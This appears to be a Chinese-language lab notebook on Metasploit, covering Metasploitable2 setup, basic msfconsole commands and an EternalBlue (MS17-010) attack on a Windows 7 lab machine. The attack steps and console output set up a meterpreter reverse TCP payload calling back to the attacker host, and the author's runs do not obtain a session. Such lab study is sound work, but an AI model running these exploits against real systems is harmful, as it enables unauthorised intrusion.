metasploitable2
metasploitable为基于ubuntu的靶机。
下载后直接打开虚拟机即可。
默认账号密码是msfadmin
# 设置root密码
sudo passwd root
# 设置固定IP
vi /etc/network/interfaces
auto eth0
iface eth0 inet static
address xxx.xxx.xxx.xxx
netmask 255.255.255.0
gateway xxx.xxx.xxx.xxx
# 重启网卡
/etc/init.d/networking restart
metasploit framework
msf依赖postgresql数据库,因此需要在kali中先开启
# 启动postgresql
systemctl start postgresql
# 设置开机自启
systemctl enable postgresql
在打开msf console时,也会自动启动postgresql
-
connect命令
一般用于内网渗透。
msf6 > connect Usage: connect [options]
Communicate with a host, similar to interacting via netcat, taking advantage of any configured session pivoting. OPTIONS: -C Try to use CRLF for EOL sequence. -P Specify source port. -S Specify source address. -c Specify which Comm to use. -h Help banner. -i Send the contents of a file. -p List of proxies to use. -s Connect with SSL. -u Switch to a UDP socket. -w Specify connect timeout. -z Just try to connect, then return. msf6 > connect xuegod.cn 80 [*] Connected to xuegod.cn:80 (via: 0.0.0.0:0) get / HTTP/1.1 400 Bad Request Server: nginx/1.6.2 Date: Thu, 21 Jan 2021 08:05:06 GMT Content-Type: text/html Content-Length: 172 Connection: close 400 Bad Request 400 Bad Request
nginx/1.6.2 -
show命令
show options 查看需要的参数
-
search命令
search name:mysql
search path:mysql 查询mysql目录下的漏洞
search platform:mysql 查询影响mysql平台的漏洞
search cve:CVE-2017-8464
-
use命令
use 模块的名字
msf6 > search cve:8464 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/fileformat/cve_2017_8464_lnk_rce 2017-06-13 excellent No LNK Code Execution Vulnerability 1 exploit/windows/local/cve_2017_8464_lnk_lpe 2017-06-13 excellent Yes LNK Code Execution Vulnerability Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/local/cve_2017_8464_lnk_lpe msf6 > use 0 msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) >
-
info命令
msf6 > search cve:8464 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/fileformat/cve_2017_8464_lnk_rce 2017-06-13 excellent No LNK Code Execution Vulnerability 1 exploit/windows/local/cve_2017_8464_lnk_lpe 2017-06-13 excellent Yes LNK Code Execution Vulnerability Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/local/cve_2017_8464_lnk_lpe msf6 > info 0 Name: LNK Code Execution Vulnerability Module: exploit/windows/fileformat/cve_2017_8464_lnk_rce Platform: Windows Arch: x86, x64 Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2017-06-13 Provided by: Uncredited Yorick Koster Spencer McIntyre Module stability: crash-service-restarts Available targets: Id Name -- ---- 0 Automatic 1 Windows x64 2 Windows x86 Check supported: No Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- DLLNAME FlashPlayerCPLApp.cpl no The DLL file containing the payload FILENAME Flash Player.lnk no The LNK file PATH no An explicit path to where the files will be hosted Payload information: Space: 2048 Description: This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain a dynamic icon, loaded from a malicious DLL. This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is similar except an additional SpecialFolderDataBlock is included. The folder ID set in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary DLL file. If no PATH is specified, the module will use drive letters D through Z so the files may be placed in the root path of a drive such as a shared VM folder or USB drive. References: https://cvedetails.com/cve/CVE-2017-8464/ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464 http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt https://msdn.microsoft.com/en-us/library/dd871305.aspx http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
使用永恒之蓝对WIN7进行渗透
msf6 > search ms17_010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/ms17_010_psexec
msf6 > use 1
msf6 auxiliary(scanner/smb/smb_ms17_010) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST=192.168.197.54
[-] Unknown variable
Usage: set [option] [value]
Set the given option to value. If value is omitted, print the current value.
If both are omitted, print options that are currently set.
If run from a module context, this will set the value in the module's
datastore. Use -g to operate on the global datastore.
If setting a PAYLOAD, this command can take an index from `show payloads'.
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.197.54
RHOST => 192.168.197.54
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.197.54:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x86 (32-bit)
[*] 192.168.197.54:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > back
msf6 > search ms17_010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/ms17_010_psexec
msf6 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.197.53 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.197.54
RHOST => 192.168.197.54
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.197.53:4444
[*] 192.168.197.54:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.197.54:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x86 (32-bit)
[*] 192.168.197.54:445 - Scanned 1 of 1 hosts (100% complete)
[-] 192.168.197.54:445 - Exploit aborted due to failure: no-target: This exploit module only supports x64 (64-bit) targets
[*] Exploit completed, but no session was created.
这里渗透失败了,是因为目标机是32位系统,而MSF内置的漏洞是64位的,需要安装32位的漏洞,这里参考的:https://blog.csdn.net/qq_41617034/article/details/91051614。然后使用32位的漏洞进行渗透:
msf6 exploit(windows/smb/eternalblue_doublepulsar) > run
[*] Started reverse TCP handler on 192.168.197.53:4444
[*] 192.168.197.54:445 - Generating Eternalblue XML data
[*] 192.168.197.54:445 - Generating Doublepulsar XML data
[*] 192.168.197.54:445 - Generating payload DLL for Doublepulsar
[*] 192.168.197.54:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.197.54:445 - Launching Eternalblue...
[+] 192.168.197.54:445 - Backdoor is already installed
[*] 192.168.197.54:445 - Launching Doublepulsar...
[+] 192.168.197.54:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.
run了几次,但还是失败了,不知道是什么原因。